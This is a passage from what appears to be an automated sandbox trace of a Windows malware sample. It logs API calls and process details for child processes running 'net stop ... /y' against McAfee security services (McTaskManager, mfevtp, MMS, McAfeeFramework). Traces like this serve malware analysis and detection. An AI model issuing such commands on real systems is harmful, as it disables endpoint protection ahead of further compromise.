_String2="McTaskManager") returned 5 [0099.306] _wcsicmp (_String1="rcv", _String2="McTaskManager") returned 5 [0099.306] _wcsicmp (_String1="netpopup", _String2="McTaskManager") returned 1 [0099.306] _wcsicmp (_String1="redirector", _String2="McTaskManager") returned 5 [0099.306] _wcsicmp (_String1="redir", _String2="McTaskManager") returned 5 [0099.306] _wcsicmp (_String1="rdr", _String2="McTaskManager") returned 5 [0099.306] _wcsicmp (_String1="workstation", _String2="McTaskManager") returned 10 [0099.306] _wcsicmp (_String1="work", _String2="McTaskManager") returned 10 [0099.306] _wcsicmp (_String1="wksta", _String2="McTaskManager") returned 10 [0099.306] _wcsicmp (_String1="prdr", _String2="McTaskManager") returned 3 [0099.306] _wcsicmp (_String1="devrdr", _String2="McTaskManager") returned -9 [0099.306] _wcsicmp (_String1="lanmanworkstation", _String2="McTaskManager") returned -1 [0099.306] _wcsicmp (_String1="server", _String2="McTaskManager") returned 6 [0099.306] _wcsicmp (_String1="svr", _String2="McTaskManager") returned 6 [0099.306] _wcsicmp (_String1="srv", _String2="McTaskManager") returned 6 [0099.306] _wcsicmp (_String1="lanmanserver", _String2="McTaskManager") returned -1 [0099.306] _wcsicmp (_String1="alerter", _String2="McTaskManager") returned -12 [0099.306] _wcsicmp (_String1="netlogon", _String2="McTaskManager") returned 1 [0099.307] _wcsupr (in: _String="McTaskManager" | out: _String="MCTASKMANAGER") returned="MCTASKMANAGER" [0099.307] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6ce10 [0099.311] GetServiceKeyNameW (in: hSCManager=0x6ce10, lpDisplayName="MCTASKMANAGER", lpServiceName=0xff685750, lpcchBuffer=0x26f7c8 | out: lpServiceName="", lpcchBuffer=0x26f7c8) returned 0 [0099.312] _wcsicmp (_String1="msg", _String2="MCTASKMANAGER") returned 16 [0099.312] _wcsicmp (_String1="messenger", _String2="MCTASKMANAGER") returned 2 [0099.312] _wcsicmp (_String1="receiver", _String2="MCTASKMANAGER") returned 5 [0099.312] _wcsicmp (_String1="rcv", _String2="MCTASKMANAGER") returned 5 [0099.312] _wcsicmp (_String1="redirector", _String2="MCTASKMANAGER") returned 5 [0099.312] _wcsicmp (_String1="redir", _String2="MCTASKMANAGER") returned 5 [0099.312] _wcsicmp (_String1="rdr", _String2="MCTASKMANAGER") returned 5 [0099.312] _wcsicmp (_String1="workstation", _String2="MCTASKMANAGER") returned 10 [0099.312] _wcsicmp (_String1="work", _String2="MCTASKMANAGER") returned 10 [0099.312] _wcsicmp (_String1="wksta", _String2="MCTASKMANAGER") returned 10 [0099.312] _wcsicmp (_String1="prdr", _String2="MCTASKMANAGER") returned 3 [0099.312] _wcsicmp (_String1="devrdr", _String2="MCTASKMANAGER") returned -9 [0099.312] _wcsicmp (_String1="lanmanworkstation", _String2="MCTASKMANAGER") returned -1 [0099.312] _wcsicmp (_String1="server", _String2="MCTASKMANAGER") returned 6 [0099.312] _wcsicmp (_String1="svr", _String2="MCTASKMANAGER") returned 6 [0099.313] _wcsicmp (_String1="srv", _String2="MCTASKMANAGER") returned 6 [0099.313] _wcsicmp (_String1="lanmanserver", _String2="MCTASKMANAGER") returned -1 [0099.313] _wcsicmp (_String1="alerter", _String2="MCTASKMANAGER") returned -12 [0099.313] _wcsicmp (_String1="netlogon", _String2="MCTASKMANAGER") returned 1 [0099.313] NetServiceControl (in: servername=0x0, service="MCTASKMANAGER", opcode=0x0, arg=0x0, bufptr=0x26f7d0 | out: bufptr=0x26f7d0) returned 0x889 [0099.313] wcscpy_s (in: _Destination=0xff6880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0099.314] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0099.314] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff685b50, nSize=0x800, Arguments=0xff687f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0099.316] GetFileType (hFile=0xb) returned 0x2 [0099.316] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f698 | out: lpMode=0x26f698) returned 1 [0099.316] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff685b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26f690, lpReserved=0x0 | out: lpBuffer=0xff685b50*, lpNumberOfCharsWritten=0x26f690*=0x1e) returned 1 [0099.317] GetFileType (hFile=0xb) returned 0x2 [0099.317] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f698 | out: lpMode=0x26f698) returned 1 [0099.317] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff661efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f690, lpReserved=0x0 | out: lpBuffer=0xff661efc*, lpNumberOfCharsWritten=0x26f690*=0x2) returned 1 [0099.317] _ultow (in: _Dest=0x889, _Radix=2553600 | out: _Dest=0x889) returned="2185" [0099.317] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff685b50, nSize=0x800, Arguments=0xff687f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0099.318] GetFileType (hFile=0xb) returned 0x2 [0099.318] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f698 | out: lpMode=0x26f698) returned 1 [0099.318] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff685b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26f690, lpReserved=0x0 | out: lpBuffer=0xff685b50*, lpNumberOfCharsWritten=0x26f690*=0x34) returned 1 [0099.318] GetFileType (hFile=0xb) returned 0x2 [0099.319] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f698 | out: lpMode=0x26f698) returned 1 [0099.319] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff661efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f690, lpReserved=0x0 | out: lpBuffer=0xff661efc*, lpNumberOfCharsWritten=0x26f690*=0x2) returned 1 [0099.319] NetApiBufferFree (Buffer=0x64d50) returned 0x0 [0099.319] NetApiBufferFree (Buffer=0x6c100) returned 0x0 [0099.319] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McTaskManager /y" [0099.319] exit (_Code=2) Process: id = "141" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5fd8d000" os_pid = "0x10b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop mfevtp /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6306 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6307 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6308 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6309 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 6310 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6311 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6312 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6313 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6314 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6315 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6316 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 6317 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6318 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 6319 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6320 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 561 os_tid = 0x1104 Process: id = "142" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5f8ad000" os_pid = "0x11b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MMS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6347 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6348 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6349 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6350 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6351 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6352 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6353 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6354 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6355 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6356 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6357 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 6358 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6428 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 6429 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6430 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 563 os_tid = 0x10ec Process: id = "143" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x615e8000" os_pid = "0x1138" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "134" os_parent_pid = "0x1114" cmd_line = "C:\\Windows\\system32\\net1 stop McAfeeFrameworkMcAfeeFramework /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6359 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6360 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6361 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6362 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6363 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6364 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6365 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6366 start_va = 0xff660000 end_va = 0xff692fff entry_point = 0xff660000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6367 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6368 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6369 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 6370 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6371 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 6372 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6373 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6374 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6375 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6376 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6377 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6378 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6379 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6380 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6381 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6382 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6383 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6384 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6385 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6386 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6387 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6388 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6389 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6390 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6391 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6431 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6432 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6433 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6434 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 6435 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 6436 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 564 os_tid = 0x10f8 [0099.582] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fe10 | out: lpSystemTimeAsFileTime=0x24fe10*(dwLowDateTime=0xf0866c90, dwHighDateTime=0x1d48689)) [0099.582] GetCurrentProcessId () returned 0x1138 [0099.582] GetCurrentThreadId () returned 0x10f8 [0099.582] GetTickCount () returned 0x22ae6 [0099.582] QueryPerformanceCounter (in: lpPerformanceCount=0x24fe18 | out: lpPerformanceCount=0x24fe18*=1814650100000) returned 1 [0099.583] GetModuleHandleW (lpModuleName=0x0) returned 0xff660000 [0099.583] __set_app_type (_Type=0x1) [0099.583] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff679c9c) returned 0x0 [0099.583] __getmainargs (in: _Argc=0xff684780, _Argv=0xff684790, _Env=0xff684788, _DoWildCard=0, _StartInfo=0xff68479c | out: _Argc=0xff684780, _Argv=0xff684790, _Env=0xff684788) returned 0 [0099.583] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.583] GetConsoleOutputCP () returned 0x1b5 [0099.584] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff68cec0 | out: lpCPInfo=0xff68cec0) returned 1 [0099.584] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0099.586] sprintf_s (in: _DstBuf=0x24fdb8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0099.586] setlocale (category=0, locale=".437") returned="English_United States.437" [0099.588] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.588] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0099.588] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeFrameworkMcAfeeFramework /y" [0099.588] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24fb50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0099.588] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0099.588] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fda8 | out: Buffer=0x24fda8*=0xac100) returned 0x0 [0099.588] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fda8 | out: Buffer=0x24fda8*=0xac120) returned 0x0 [0099.588] _fileno (_File=0x7fefdba2a80) returned 0 [0099.588] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0099.589] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0099.589] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0099.589] _wcsicmp (_String1="config", _String2="stop") returned -16 [0099.589] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0099.589] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0099.589] _wcsicmp (_String1="file", _String2="stop") returned -13 [0099.589] _wcsicmp (_String1="files", _String2="stop") returned -13 [0099.589] _wcsicmp (_String1="group", _String2="stop") returned -12 [0099.589] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0099.589] _wcsicmp (_String1="help", _String2="stop") returned -11 [0099.589] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0099.589] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0099.589] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0099.589] _wcsicmp (_String1="session", _String2="stop") returned -15 [0099.589] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0099.589] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0099.589] _wcsicmp (_String1="share", _String2="stop") returned -12 [0099.589] _wcsicmp (_String1="start", _String2="stop") returned -14 [0099.589] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0099.590] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0099.590] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0099.590] _wcsicmp (_String1="accounts", _String2="McAfeeFrameworkMcAfeeFramework") returned -12 [0099.590] _wcsicmp (_String1="computer", _String2="McAfeeFrameworkMcAfeeFramework") returned -10 [0099.590] _wcsicmp (_String1="config", _String2="McAfeeFrameworkMcAfeeFramework") returned -10 [0099.590] _wcsicmp (_String1="continue", _String2="McAfeeFrameworkMcAfeeFramework") returned -10 [0099.590] _wcsicmp (_String1="cont", _String2="McAfeeFrameworkMcAfeeFramework") returned -10 [0099.590] _wcsicmp (_String1="file", _String2="McAfeeFrameworkMcAfeeFramework") returned -7 [0099.590] _wcsicmp (_String1="files", _String2="McAfeeFrameworkMcAfeeFramework") returned -7 [0099.590] _wcsicmp (_String1="group", _String2="McAfeeFrameworkMcAfeeFramework") returned -6 [0099.590] _wcsicmp (_String1="groups", _String2="McAfeeFrameworkMcAfeeFramework") returned -6 [0099.590] _wcsicmp (_String1="help", _String2="McAfeeFrameworkMcAfeeFramework") returned -5 [0099.590] _wcsicmp (_String1="helpmsg", _String2="McAfeeFrameworkMcAfeeFramework") returned -5 [0099.590] _wcsicmp (_String1="localgroup", _String2="McAfeeFrameworkMcAfeeFramework") returned -1 [0099.590] _wcsicmp (_String1="pause", _String2="McAfeeFrameworkMcAfeeFramework") returned 3 [0099.590] _wcsicmp (_String1="session", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0099.590] _wcsicmp (_String1="sessions", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0099.590] _wcsicmp (_String1="sess", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0099.590] _wcsicmp (_String1="share", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0099.591] _wcsicmp (_String1="start", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0099.591] _wcsicmp (_String1="stats", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0099.591] _wcsicmp (_String1="statistics", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0099.591] _wcsicmp (_String1="stop", _String2="McAfeeFrameworkMcAfeeFramework") returned 6 [0099.591] _wcsicmp (_String1="time", _String2="McAfeeFrameworkMcAfeeFramework") returned 7 [0099.591] _wcsicmp (_String1="user", _String2="McAfeeFrameworkMcAfeeFramework") returned 8 [0099.591] _wcsicmp (_String1="users", _String2="McAfeeFrameworkMcAfeeFramework") returned 8 [0099.591] _wcsicmp (_String1="msg", _String2="McAfeeFrameworkMcAfeeFramework") returned 16 [0099.591] _wcsicmp (_String1="messenger", _String2="McAfeeFrameworkMcAfeeFramework") returned 2 [0099.591] _wcsicmp (_String1="receiver", _String2="McAfeeFrameworkMcAfeeFramework") returned 5 [0099.591] _wcsicmp (_String1="rcv", _String2="McAfeeFrameworkMcAfeeFramework") returned 5 [0099.591] _wcsicmp (_String1="netpopup", _String2="McAfeeFrameworkMcAfeeFramework") returned 1 [0099.591] _wcsicmp (_String1="redirector", _String2="McAfeeFrameworkMcAfeeFramework") returned 5 [0099.591] _wcsicmp (_String1="redir", _String2="McAfeeFrameworkMcAfeeFramework") returned 5 [0099.591] _wcsicmp (_String1="rdr", _String2="McAfeeFrameworkMcAfeeFramework") returned 5 [0099.591] _wcsicmp (_String1="workstation", _String2="McAfeeFrameworkMcAfeeFramework") returned 10 [0099.591] _wcsicmp (_String1="work", _String2="McAfeeFrameworkMcAfeeFramework") returned 10 [0099.591] _wcsicmp (_String1="wksta", _String2="McAfeeFrameworkMcAfeeFramework") returned 10 [0099.591] _wcsicmp (_String1="prdr", _String2="McAfeeFrameworkMcAfeeFramework") returned 3 [0099.591] _wcsicmp (_String1="devrdr", 